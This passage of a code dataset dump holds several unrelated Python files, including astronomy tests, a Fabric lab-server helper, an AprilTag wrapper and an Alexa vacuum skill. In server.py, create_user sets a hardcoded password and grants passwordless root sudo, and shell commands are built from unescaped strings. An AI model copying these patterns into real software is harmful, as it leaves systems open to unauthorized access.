1e10], 'TeV')\n desired = u.Quantity(self.source.data['Flux_Spec_PL_Int_1TeV'], 'cm-2 s-1')\n assert_quantity_allclose(model.integral(emin, emax), desired, rtol=0.01)\n\n @requires_dependency('matplotlib')\n def test_model_plot(self):\n model = self.source.spectral_model\n erange = [1, 10] * u.TeV\n model.plot(erange)\n\n def test_spatial_model_gaussian(self):\n source = self.cat['HESS J1119-614']\n model = source.spatial_model(emin=1 * u.TeV, emax=1e3 * u.TeV)\n actual = model.amplitude\n desired = 1.52453e-11\n assert_allclose(actual, desired, rtol=1e-3)\n\n def test_spatial_model_shell(self):\n source = self.cat['Vela Junior']\n model = source.spatial_model(emin=1 * u.TeV, emax=1e3 * u.TeV)\n actual = model.amplitude\n desired = 2.33949e-11\n assert_allclose(actual, desired, rtol=1e-3)\n\n def test_spatial_model_point(self):\n source = self.cat['HESS J1826-148']\n model = source.spatial_model(emin=1 * u.TeV, emax=1e3 * u.TeV)\n actual = model.amplitude\n desired = 8.353370e-13\n assert_allclose(actual, desired, rtol=1e-3)","sub_path":"gammapy/catalog/tests/test_hess.py","file_name":"test_hess.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379263033","text":"from lab.lab_node import LabNode\n\n\nclass Server(LabNode):\n\n _temp_dir = None\n\n @property\n def temp_dir(self):\n if not self._temp_dir:\n import os\n import random\n\n chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'\n self._temp_dir = os.path.join('/tmp', 'server-tmp-' + ''.join(random.sample(chars, 10)))\n\n if not self._tmp_dir_exists:\n from fabric.api import settings\n\n # if self.run('test -d {0}'.format(self._temp_dir), warn_only=True).return_code:\n # self._tmp_dir_exists = self.run('mkdir -p {0}'.format(self._temp_dir)).return_code == 0\n return self._temp_dir if self._tmp_dir_exists else None\n\n def __init__(self, node_id, role, lab, hostname):\n self._tmp_dir_exists = False\n self._package_manager = None\n self._mac_server_part = None\n\n super(Server, self).__init__(node_id=node_id, role=role, lab=lab, hostname=hostname)\n\n def get_package_manager(self):\n if not self._package_manager:\n possible_packages = ['apt-get', 'dnf', 'yum']\n for x in possible_packages:\n if self.run(command='whereis {0}'.format(x)) != x + ':':\n self._package_manager = x\n break\n if not self._package_manager:\n raise RuntimeError('do not know which package manager to use: neither of {0} found'.format(possible_packages))\n return self._package_manager\n\n def construct_settings(self, warn_only, connection_attempts=100):\n import validators\n from lab import with_config\n\n ssh_ip, ssh_username, ssh_password = self.get_ssh()\n ssh_ip = ssh_ip if validators.ipv4(ssh_ip) else self.get_oob()[0]\n\n kwargs = {'host_string': '{user}@{ip}'.format(user=ssh_username, ip=ssh_ip),\n 'connection_attempts': connection_attempts,\n 'warn_only': warn_only}\n if ssh_password == 'ssh_key':\n kwargs['key_filename'] = with_config.KEY_PRIVATE_PATH\n else:\n kwargs['password'] = ssh_password\n return kwargs\n\n def cmd(self, cmd):\n raise NotImplementedError\n\n def run(self, command, in_directory='.', warn_only=False, connection_attempts=100):\n from fabric.api import run, sudo, settings, cd\n from fabric.exceptions import NetworkError\n\n if str(self.get_ssh_ip()) in ['localhost', '127.0.0.1']:\n return self.run_local(command, in_directory=in_directory, warn_only=warn_only)\n\n run_or_sudo = run\n if command.startswith('sudo '):\n command = command.replace('sudo ', '')\n run_or_sudo = sudo\n\n with settings(**self.construct_settings(warn_only=warn_only, connection_attempts=connection_attempts)):\n with cd(in_directory):\n try:\n return run_or_sudo(command)\n except NetworkError as ex:\n if warn_only:\n self.log(message=ex.message, level='warning')\n return ''\n else:\n raise\n\n def reboot(self, wait=300):\n \"\"\"Reboot this server\n :param wait: wait for the server to come up\n \"\"\"\n from fabric.api import reboot, settings\n with settings(**self.construct_settings(warn_only=True)):\n reboot(wait=wait)\n\n @staticmethod\n def run_local(command, in_directory='.', warn_only=False):\n from fabric.api import local, settings, lcd\n\n if in_directory != '.':\n local('mkdir -p {0}'.format(in_directory))\n with settings(warn_only=warn_only):\n with lcd(in_directory):\n return local(command=command, capture=True)\n\n def put(self, local_path, remote_path, is_sudo):\n \"\"\"Faced the normal fabric put to provide server details from the class\n :param local_path:\n :param remote_path:\n :param is_sudo:\n :return:\n \"\"\"\n from fabric.api import put, settings\n\n with settings(**self.construct_settings(warn_only=False)):\n return put(local_path=local_path, remote_path=remote_path, use_sudo=is_sudo)\n\n def put_string_as_file_in_dir(self, string_to_put, file_name, in_directory='.'):\n \"\"\"Put given string as file to remote server\n :param string_to_put:\n :param file_name:\n :param in_directory:\n :return:\n \"\"\"\n from fabric.api import put, settings, cd, lcd, local\n import os\n from StringIO import StringIO\n\n if '/' in file_name:\n raise SyntaxError('file_name can not contain /, use in_directory instead')\n\n use_sudo = True if in_directory.startswith('/') else False\n\n if in_directory != '.':\n self.run(command='{0} mkdir -p {1}'.format('sudo' if use_sudo else '', in_directory))\n\n if str(self.get_ssh_ip()) in ['localhost', '127.0.0.1']:\n with lcd(in_directory):\n local('echo \"{0}\" > {1}'.format(string_to_put, file_name))\n return os.path.abspath(os.path.join(in_directory, file_name))\n else:\n with settings(**self.construct_settings(warn_only=False)):\n with cd(in_directory):\n return put(local_path=StringIO(string_to_put), remote_path=file_name, use_sudo=use_sudo)[0]\n\n def get_file_from_dir(self, file_name, in_directory='.', local_path=None):\n \"\"\"Get remote file as string or local file if local_path is specified\n :param file_name:\n :param in_directory:\n :param local_path:\n :return:\n \"\"\"\n from fabric.api import sudo, settings, cd\n\n if '/' in file_name:\n raise SyntaxError('file_name can not contain /, use in_directory instead')\n\n with settings(**self.construct_settings(warn_only=False)):\n with cd(in_directory):\n body = sudo('cat {0}'.format(file_name))\n\n if local_path:\n with open(local_path, 'w') as f:\n f.write(body)\n return local_path\n else:\n return body\n\n def wget_file(self, url, to_directory='.', checksum=None):\n loc = url.split('/')[-1]\n if to_directory != '.':\n self.run('mkdir -p {0}'.format(to_directory))\n self.run(command='test -e {loc} || curl {url} -o {loc}'.format(loc=loc, url=url), in_directory=to_directory)\n if checksum == 'in-file':\n checksum = self.run('curl {0}'.format(url + '.sha256sum.txt')).split()[0]\n\n calc_checksum = self.run(command='sha256sum {loc}'.format(loc=loc), in_directory=to_directory)\n if checksum:\n if calc_checksum.split()[0] != checksum:\n self.run(command='rm {0}'.format(loc), in_directory=to_directory)\n raise RuntimeError('I deleted image {} taken from {} since it is broken (checksum is not matched). Re-run the script'.format(loc, url + '.sha256sum.txt'))\n else:\n self.log('Checksum was not provided and not found in .sha256sum.txt. Calculated checksum is {}'.format(calc_checksum))\n return self.run(command='readlink -f {0}'.format(loc), in_directory=to_directory)\n\n def check_or_install_packages(self, package_names):\n pm = self.get_package_manager()\n\n for package_name in package_names.split():\n if self.run(command='whereis {0}'.format(package_name)) == package_name + ':':\n self.run(command='sudo {0} install -y {1}'.format(pm, package_names))\n\n def clone_repo(self, repo_url, local_repo_dir=None, tags=None, patch=None):\n import urlparse\n\n local_repo_dir = local_repo_dir or urlparse.urlparse(repo_url).path.split('/')[-1].strip('.git')\n\n self.check_or_install_packages(package_names='git')\n self.run(command='test -d {0} || git clone -q {1} {0}'.format(local_repo_dir, repo_url))\n self.run(command='git pull -q', in_directory=local_repo_dir)\n if patch:\n self.run(command='git fetch {0} && git checkout FETCH_HEAD'.format(patch))\n elif tags:\n self.run(command='git checkout tags/{0}'.format(tags), in_directory=local_repo_dir)\n return self.run(command='pwd', in_directory=local_repo_dir)\n\n def create_user(self, new_username):\n from lab import with_config\n\n tmp_password = 'cisco123'\n if not self.run(command='grep {0} /etc/passwd'.format(new_username), warn_only=True):\n encrypted_password = self.run(command='openssl passwd -crypt {0}'.format(tmp_password))\n self.run(command='sudo adduser -p {0} {1}'.format(encrypted_password.split()[-1], new_username)) # encrypted password may contain Warning\n self.run(command='sudo echo \"{0} ALL=(root) NOPASSWD:ALL\" | tee -a /etc/sudoers.d/{0}'.format(new_username))\n self.run(command='sudo chmod 0440 /etc/sudoers.d/{0}'.format(new_username))\n self.set_ssh_creds(username=new_username, password=tmp_password)\n with open(with_config.KEY_PUBLIC_PATH) as f:\n self.put_string_as_file_in_dir(string_to_put=f.read(), file_name='authorized_keys', in_directory='.ssh')\n self.run(command='sudo chmod 700 .ssh')\n self.run(command='sudo chmod 600 .ssh/authorized_keys')\n self.set_ssh_creds(username=new_username, password='ssh_key')\n\n def ping(self, port=22):\n import socket\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(1)\n try:\n s.connect((str(self.get_ssh_ip()), port))\n res = True\n except (socket.timeout, socket.error):\n res = False\n finally:\n s.close()\n return res\n \n def actuate_hostname(self, refresh=True):\n if not hasattr(self, '_hostname') or refresh:\n self._hostname = self.run('hostname').stdout.strip()\n return self._hostname\n\n def form_mac(self, mac_pattern):\n return '00:{lab:02}:00:{role_id}:{count:02}:{net}'.format(lab=self._lab.get_id(), role_id=self.lab().ROLES[self.get_role()], count=self._n, net=mac_pattern)\n\n def list_ip_info(self, connection_attempts=100):\n ans_a = self.run('ip -o a', connection_attempts=connection_attempts, warn_only=True)\n if not ans_a:\n return {}\n ans_l = self.run('ip -o l', connection_attempts=connection_attempts, warn_only=True)\n name_ipv4_ipv6 = {}\n for line in ans_a.split('\\n'):\n _, nic_name, other = line.split(' ', 2)\n name_ipv4_ipv6.setdefault(nic_name, {'ipv4': None, 'ipv6': None})\n if 'inet6' in other:\n name_ipv4_ipv6[nic_name]['ipv6'] = other.split()[1].strip()\n else:\n name_ipv4_ipv6[nic_name]['ipv4'] = other.split()[1].strip()\n\n result = {}\n for line in ans_l.split('\\n'):\n number, nic_name, other = line.split(':', 2)\n nic_name = nic_name.strip()\n if nic_name == 'lo':\n continue\n status, mac_part = other.split('link/ether')\n mac = mac_part.split(' brd ')[0].strip()\n ipv4 = name_ipv4_ipv6.get(nic_name, {'ipv4': None})['ipv4']\n ipv6 = name_ipv4_ipv6.get(nic_name, {'ipv6': None})['ipv6']\n result[nic_name] = {'mac': mac.upper(), 'ipv4': ipv4, 'ipv6': ipv6}\n return result\n\n def is_nics_correct(self):\n actual_nics = self.list_ip_info(connection_attempts=1)\n if not actual_nics:\n return False\n\n for nic in self.get_nics().values():\n mac = nic.get_mac() # be careful : after bonding all interfaces of the bond get mac of the first one\n ip, _ = nic.get_ip_and_mask()\n prefix_len = nic.get_net().prefixlen\n ip = ip + '/' + str(prefix_len)\n master_nic_name = nic.get_name()\n if master_nic_name not in actual_nics:\n self.log(message='has no master NIC {}'.format(master_nic_name), level='warning')\n return False\n actual_ip = actual_nics[master_nic_name]['ipv4']\n if ip != actual_ip: # this ip might be re-assign to the bridge which has this NIC inside\n if ip != actual_nics['br-' + master_nic_name]['ipv4']:\n self.log(message='NIC {} has different IP actual: {} requested: {}'.format(nic.get_name(), actual_ip, ip), level='warning')\n return False\n for slave_nic_name, _ in sorted(nic.get_slave_nics().items()):\n if slave_nic_name not in actual_nics:\n self.log(message='has no slave NIC {}'.format(slave_nic_name), level='warning')\n return False\n actual_mac = actual_nics[slave_nic_name]['mac'].upper()\n if actual_mac != mac.upper():\n self.log(message='NIC {} has different mac: actual {} requested {}'.format(slave_nic_name, actual_mac, mac), level='warning')\n return False\n return True\n\n def register_rhel(self, rhel_subscription_creds_url):\n import requests\n import json\n\n text = requests.get(rhel_subscription_creds_url).text\n rhel_json = json.loads(text)\n rhel_username = rhel_json['rhel-username']\n rhel_password = rhel_json['rhel-password']\n rhel_pool_id = rhel_json['rhel-pool-id']\n\n repos_to_enable = ['--enable=rhel-7-server-rpms',\n '--enable=rhel-7-server-optional-rpms',\n '--enable=rhel-7-server-extras-rpms',\n '--enable=rhel-7-server-openstack-7.0-rpms',\n '--enable=rhel-7-server-openstack-7.0-director-rpms']\n status = self.run(command='subscription-manager status', warn_only=True)\n if 'Overall Status: Current' not in status:\n self.run(command='sudo subscription-manager register --force --username={0} --password={1}'.format(rhel_username, rhel_password))\n available_pools = self.run(command='sudo subscription-manager list --available')\n if rhel_pool_id not in available_pools:\n raise ValueError('Provided RHEL pool id \"{}\" is not in the list of available pools, plz check your RHEL credentials here {}'.format(rhel_pool_id, rhel_subscription_creds_url))\n\n self.run(command='sudo subscription-manager attach --pool={0}'.format(rhel_pool_id))\n self.run(command='sudo subscription-manager repos --disable=*')\n self.run(command='sudo subscription-manager repos ' + ' '.join(repos_to_enable))\n","sub_path":"lab/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":14686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"104798798","text":"\nfrom datetime import datetime, timedelta\nfrom time import sleep\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import IntegrityError, models, transaction\nfrom billservice.models import Account\n\n\n\nPAYMENT_MODE_CHOICES = (\n (0, 'REAL'),\n (1, 'TEST'),\n)\n\nclass Payment(models.Model):\n account = models.ForeignKey(Account, related_name='webmoney_account_set')\n created = models.DateTimeField(auto_now_add=True, editable=False)\n\n purse = models.CharField(max_length=32)\n\n amount = models.DecimalField(decimal_places=2, max_digits=9)\n\n mode = models.PositiveSmallIntegerField(choices=PAYMENT_MODE_CHOICES)\n\n sys_invs_no = models.PositiveIntegerField()\n sys_trans_no = models.PositiveIntegerField()\n sys_trans_date = models.DateTimeField()\n\n payer_purse = models.CharField(max_length=13)\n payer_wm = models.CharField(max_length=12)\n\n paymer_number = models.CharField(max_length=30, blank=True)\n paymer_email = models.EmailField(blank=True)\n\n telepat_phonenumber = models.CharField(max_length=30, blank=True)\n telepat_orderid = models.CharField(max_length=30, blank=True)\n\n payment_creditdays = models.PositiveIntegerField(blank=True, null=True)\n \n def __unicode__(self):\n return \"%s - %s WM%s\" % (self.payment_no, self.amount, self.purse)\n","sub_path":"webadmin/ebscab/paymentgateways/webmoney/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"125819164","text":"import os.path\nimport unittest\nfrom unittest.mock import patch\n\nfrom core.threat import IPDetails\n\n\nclass IPDetailsTC(unittest.TestCase):\n # test case: 69.43.161.174\n with open(os.path.join(os.path.dirname(__file__), 'test_fixture.json'),\n encoding='utf-8') as fp:\n response_text = fp.read()\n\n def test_simple(self):\n with patch('core.threat.IPDetails.fetch') as gt:\n gt.return_value = self.response_text\n ipd = IPDetails('69.43.161.174')\n self.assertEqual(ipd.is_valid, True)\n self.assertEqual(ipd.id, \"4ea30af203b04d5a140035ce\")\n self.assertEqual(ipd.reputation_val, \"2\")\n self.assertEqual(ipd.first_activity, 1319315215)\n self.assertEqual(ipd.last_activity, 1342955302)\n self.assertEqual(len(ipd.activities), 50)\n self.assertEqual(ipd.activities[0], {\n 'activity_type': 'Malicious Host',\n 'first_date': 1319315215,\n 'last_date': 1322894309\n })\n self.assertEqual(set(ipd.activity_types),\n set(['Malicious Host', 'Malware Domain',\n 'C&C', 'Spamming']))\n","sub_path":"core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"248789308","text":"#!/usr/bin/env python\nimport ctypes\nfrom ctypes import POINTER\nfrom ctypes import Structure\nfrom ctypes import c_int\nfrom ctypes import c_int32\nfrom ctypes import c_int64\nfrom ctypes import c_uint8\nfrom ctypes import c_float\nfrom ctypes import c_double\n\nimport cv2\nimport numpy as np\n\n\n# Import AprilTag C library\nLIBPATH = \"/usr/local/lib/libapriltag.so\"\nlib = ctypes.CDLL(LIBPATH)\n\n\nclass _ImageU8(Structure):\n \"\"\"Wraps image_u8 C struct.\"\"\"\n _fields_ = [\n ('width', c_int),\n ('height', c_int),\n ('stride', c_int),\n ('buf', POINTER(c_uint8))\n ]\n\n\nclass _Matd(Structure):\n \"\"\"Wraps matd C struct.\"\"\"\n _fields_ = [\n ('nrows', c_int),\n ('ncols', c_int),\n ('data', ctypes.c_double*1),\n ]\n\n\nclass _ZArray(Structure):\n \"\"\"Wraps zarray C struct.\"\"\"\n _fields_ = [\n ('el_sz', ctypes.c_size_t),\n ('size', c_int),\n ('alloc', c_int),\n ('data', ctypes.c_void_p)\n ]\n\n\nclass _AprilTagFamily(Structure):\n \"\"\"Wraps apriltag_family C struct.\"\"\"\n _fields_ = [\n ('ncodes', c_int32),\n ('codes', POINTER(c_int64)),\n ('black_border', c_int32),\n ('d', c_int32),\n ('h', c_int32),\n ('name', ctypes.c_char_p),\n ]\n\n\nclass _AprilTagDetection(Structure):\n \"\"\"Wraps apriltag_detection C struct.\"\"\"\n _fields_ = [\n ('family', POINTER(_AprilTagFamily)),\n ('id', c_int),\n ('hamming', c_int),\n ('goodness', c_float),\n ('decision_margin', c_float),\n ('H', POINTER(_Matd)),\n ('c', ctypes.c_double*2),\n ('p', (ctypes.c_double*2)*4)\n ]\n\n\nclass _AprilTagDetector(Structure):\n \"\"\"Wraps apriltag_detector C struct.\"\"\"\n _fields_ = [\n ('nthreads', c_int),\n ('quad_decimate', c_float),\n ('quad_sigma', c_float),\n ('refine_edges', c_int),\n ('refine_decode', c_int),\n ('refine_pose', c_int),\n ('debug', c_int),\n ('quad_contours', c_int),\n ]\n\n\ndef ptr_to_array2d(datatype, ptr, rows, cols):\n array_type = (datatype * cols) * rows\n array_buf = array_type.from_address(ctypes.addressof(ptr))\n return np.ctypeslib.as_array(array_buf, shape=(rows, cols))\n\n\ndef image_u8_get_array(img_ptr):\n return ptr_to_array2d(c_uint8,\n img_ptr.contents.buf.contents,\n img_ptr.contents.height,\n img_ptr.contents.stride)\n\n\ndef matd_get_array(mat_ptr):\n return ptr_to_array2d(c_double,\n mat_ptr.contents.data,\n int(mat_ptr.contents.nrows),\n int(mat_ptr.contents.ncols))\n\n\ndef convert_image(img):\n height = img.shape[0]\n width = img.shape[1]\n\n lib.image_u8_create.restype = ctypes.POINTER(_ImageU8)\n c_img = lib.image_u8_create(width, height)\n tmp = image_u8_get_array(c_img)\n\n # Copy the opencv image into the destination array, accounting for the\n # difference between stride & width.\n tmp[:, :width] = img\n\n # tmp goes out of scope here but we don't care because\n # the underlying data is still in c_img.\n return c_img\n\n\ndef tag36h11_create():\n lib.tag36h11_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag36h11_create()\n return family\n\n\ndef tag36h10_create():\n lib.tag36h10_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag36h10_create()\n return family\n\n\ndef tag36artoolkit_create():\n lib.tag36artoolkit_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag36artoolkit_create()\n return family\n\n\ndef tag25h9_create():\n lib.tag25h9_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag25h9_create()\n return family\n\n\ndef tag25h7_create():\n lib.tag25h7_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag25h7_create()\n return family\n\n\ndef apriltag_detector_create():\n lib.apriltag_detector_create.restype = POINTER(_AprilTagDetector)\n detector = lib.apriltag_detector_create()\n return detector\n\n\ndef apriltag_detector_add_family(detector, family):\n lib.apriltag_detector_add_family_bits(detector, family, 2)\n\n\ndef apriltag_detector_detect(detector, c_img):\n lib.apriltag_detector_detect.restype = POINTER(_ZArray)\n results = lib.apriltag_detector_detect(detector, c_img)\n return results\n\n\ndef apriltag_detections_destroy(detections):\n lib.apriltag_detections_destroy(detections)\n\n\ndef image_u8_destroy(c_img):\n lib.image_u8_destroy(c_img)\n\n\nclass AprilTag:\n def __init__(self, **kwargs):\n self.family = kwargs[\"family\"]\n self.id = kwargs[\"id\"]\n self.hamming = kwargs[\"hamming\"]\n self.goodness = kwargs[\"goodness\"]\n self.decision_margin = kwargs[\"decision_margin\"]\n self.H = matd_get_array(kwargs[\"H\"]).copy()\n self.c = np.ctypeslib.as_array(kwargs[\"c\"], shape=(2,)).copy()\n self.p = np.ctypeslib.as_array(kwargs[\"p\"], shape=(4, 2)).copy()\n\n def draw_corners(self, img):\n for corner in self.p:\n pt = (int(corner[0]), int(corner[1]))\n img = cv2.circle(img, pt, 10, (0, 255, 0), -1)\n\n def draw_id(self, img):\n # tag_width_px = self.p[0][0] - self.p[1][0]\n\n text = str(self.id)\n center = (int(self.c[0] - 15), int(self.c[1]))\n font = cv2.FONT_HERSHEY_DUPLEX\n color = (0, 255, 0)\n thickness = 2\n cv2.putText(img, text, center, font, 0.7, color, thickness)\n\n\nclass AprilTagDetector:\n \"\"\"Custom AprilTag library wrapper\"\"\"\n\n def __init__(self, **kwargs):\n # Tag detector\n self.detector = apriltag_detector_create()\n self.detector.contents.nthreads = kwargs.get(\"nthreads\", 1)\n self.detector.contents.quad_decimate = kwargs.get(\"quad_decimate\", 1.0)\n self.detector.contents.quad_sigma = kwargs.get(\"quad_sigma\", 0.0)\n self.detector.refine_edges = kwargs.get(\"refine_edges\", 1)\n self.detector.refine_decode = kwargs.get(\"refine_decode\", 0)\n self.detector.refine_pose = kwargs.get(\"refine_pose\", 0)\n\n # Tag family\n family_str = kwargs.get(\"family\", \"36h11\")\n family = None\n if family_str == \"36h11\":\n family = tag36h11_create()\n elif family_str == \"36h10\":\n family = tag36h10_create()\n elif family_str == \"36artoolkit\":\n family = tag36artoolkit_create()\n elif family_str == \"25h9\":\n family = tag25h9_create()\n elif family_str == \"25h7\":\n family = tag25h7_create()\n else:\n raise RuntimeError(\"Unrecognized tag family: %s\", family_str)\n\n # Add tag family to detector\n apriltag_detector_add_family(self.detector, family)\n\n def detect(self, img):\n # Make sure image is grayscale\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Create an ImageU8 instance for the detector and detect tags\n imgu8 = convert_image(gray_img)\n detections = apriltag_detector_detect(self.detector, imgu8)\n\n # Loop through detections\n results = []\n for i in range(detections.contents.size):\n # Extract the data for each apriltag that was identified\n tag = ctypes.POINTER(_AprilTagDetection)()\n el_sz = detections.contents.el_sz\n data = detections.contents.data\n ctypes.memmove(ctypes.byref(tag), data + i * el_sz, el_sz)\n\n # Create AprilTag object instance\n results.append(\n AprilTag(family=tag.contents.family,\n id=tag.contents.id,\n hamming=tag.contents.hamming,\n goodness=tag.contents.goodness,\n decision_margin=tag.contents.decision_margin,\n H=tag.contents.H,\n c=tag.contents.c,\n p=tag.contents.p)\n )\n\n # Clean up - THIS IS VERY IMPORTANT! ELSE MEMORY LEAKS!\n apriltag_detections_destroy(detections)\n image_u8_destroy(imgu8)\n\n return results\n","sub_path":"prototype/vision/apriltag.py","file_name":"apriltag.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326867926","text":"# Mark Bauman 2015\n##Part three of the parallel optimum number of trees test for random forest\n#This creates a dataFrame object of all rmse's and corresponding number of trees,\n#then plots it to see where it has leveled off.\n#Pick the number of trees that gives you a good enough estimate based on rmse\n#while still saving some computation time (pick the number of estimators\n#corresponding to the point in the graph where it approximately levels off)\n#first run part 1 and 2 of this series\n\nimport glob\nimport os, sys\nimport pandas as pd\nimport numpy as np\nfrom pandas import Series, DataFrame\n\n#loop through and retrieve rmse from filenames\n\nfilePath = '...filePath.../num_trees*' #initialize filepath\n\nrmseTable = DataFrame() #Initialize table with rmse vals\n\nfor fn in glob.glob(filePath):\n if os.path.isfile(fn):\n fn = fn.split(':')\n numTrees = int(fn[1])\n rmse = float(fn[2])\n\n dataAppend = DataFrame([[numTrees, rmse]], columns = ('numTrees', 'RMSE'))\n rmseTable = rmseTable.append(dataAppend)\n\n#sort table according to number of trees\nrmseTable = rmseTable.sort('numTrees')\n\n#Plot results: \nimport matplotlib.pyplot as plt\nplt.figure()\nplt.ion()\nplt.plot(rmseTable['RMSE'])\nplt.title('Performance of random forest')\nplt.xlabel('n_estimators')\nplt.ylabel('RMSE')\nplt.show() \n\n\n \n","sub_path":"Optimal_num_estimators/RandomForestOptimalNumTrees_3.py","file_name":"RandomForestOptimalNumTrees_3.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"107653650","text":"from __future__ import print_function\nfrom time import sleep\nfrom datetime import datetime\nfrom sucks import *\nfrom pytz import timezone\nimport os\n\ndef build_api():\n config = {\n 'device_id': EcoVacsAPI.md5(str(time.time())),\n 'email': os.environ['email'],\n 'password': EcoVacsAPI.md5(os.environ['password']),\n 'country': os.environ['country'],\n 'continent': os.environ['continent']\n }\n\n api = EcoVacsAPI(config['device_id'],config['email'],config['password'],\n config['country'],config['continent'])\n vac_id = api.devices()[0]\n vacbot = VacBot(api.uid,api.REALM,api.resource, api.user_access_token, vac_id, config['continent'])\n return vacbot\n\ndef perform_action(action):\n vacbot = build_api()\n vacbot.connect_and_wait_until_ready()\n vacbot.run(action)\n sleep(1)\n vacbot.disconnect()\n return vacbot\n\ndef perform_service():\n vacbot = build_api()\n vacbot.connect_and_wait_until_ready()\n vacbot.run(Move('turn_around'))\n sleep(2)\n vacbot.run(Move('forward'))\n vacbot.disconnect()\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(card, speech_output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': speech_output\n },\n 'card': card,\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\ndef build_clean_card():\n now = datetime.now(timezone(os.environ['timezone']))\n card_output = \"Cleaning session started on \"\n date = now.strftime(\"%B %d\")\n if now.day<10:\n date = date.replace(\"0\",\"\")\n if now.day % 10 == 1:\n date += \"st \"\n elif now.day % 10 == 2:\n date += \"nd \"\n elif now.day % 10 == 3:\n date += \"rd \"\n else:\n date += \"th \"\n time = (now.strftime(\"at %I:%M%p.\")).lower()\n if time[3] == \"0\":\n time = time[:3]+time[4:]\n return {\n 'type': 'Simple',\n 'title': \"Ecovacs\",\n 'content': card_output + date + time\n }\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_clean_response():\n speech_output = \"Your vaccum is starting its cleaning session.\"\n if 'timezone' in os.environ:\n card = build_clean_card()\n else:\n card = None\n should_end_session = True\n return build_response(None, build_speechlet_response(\n card, speech_output, None, should_end_session))\n\ndef get_charge_response():\n speech_output = \"Your vaccum is going back to its station.\"\n should_end_session = True\n return build_response(None, build_speechlet_response(\n None, speech_output, None, should_end_session))\n\ndef get_stop_response():\n speech_output = \"Your vacuum is stopping.\"\n should_end_session = True\n return build_response(None, build_speechlet_response(\n None, speech_output, None, should_end_session))\n\ndef get_service_response():\n speech_output = \"Your vacuum is ready for some servicing.\"\n should_end_session = True\n return build_response(None , build_speechlet_response(\n None, speech_output, None, should_end_session))\n\ndef get_battery_response(battery):\n speech_output = \"Your vacuum's battery is currently at %s%%.\" % int(battery*100)\n should_end_session = True\n return build_response(None, build_speechlet_response(\n None, speech_output, None, should_end_session))\n\ndef get_welcome_response():\n session_attributes = {}\n speech_output = \"Welcome to the Ecovacs skill. What can I help you with? \"\n reprompt_text = \"You can ask for your vacuum to start cleaning, come out for service\" \\\n \"or go back to its charging station.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n None, speech_output, reprompt_text, should_end_session))\n\ndef handle_session_end_request():\n speech_output = \"Thank you for trying the Ecovacs skill. \" \\\n \"Have a nice day! \"\n should_end_session = True\n return build_response({}, build_speechlet_response(\n None, speech_output, None, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\ndef on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n return get_welcome_response()\n\ndef on_intent(intent_request, session):\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n if intent_name == \"CleanIntent\":\n perform_action(Clean())\n return get_clean_response()\n elif intent_name == \"EdgeIntent\":\n perform_action(Edge())\n return get_clean_response()\n elif intent_name == \"SpotIntent\":\n perform_action(Spot())\n return get_clean_response()\n elif intent_name == \"StopIntent\":\n perform_action(Stop())\n return get_stop_response()\n elif intent_name == \"ChargeIntent\":\n perform_action(Charge())\n return get_charge_response()\n elif intent_name == \"ServiceIntent\":\n perform_service()\n return get_service_response()\n elif intent_name == \"BatteryIntent\":\n battery = perform_action(GetBatteryState())\n return get_battery_response(battery.battery_status)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\ndef on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n if 'applicationId' in os.environ:\n if (event['session']['application']['applicationId'] !=\n os.environ['applicationId']):\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return 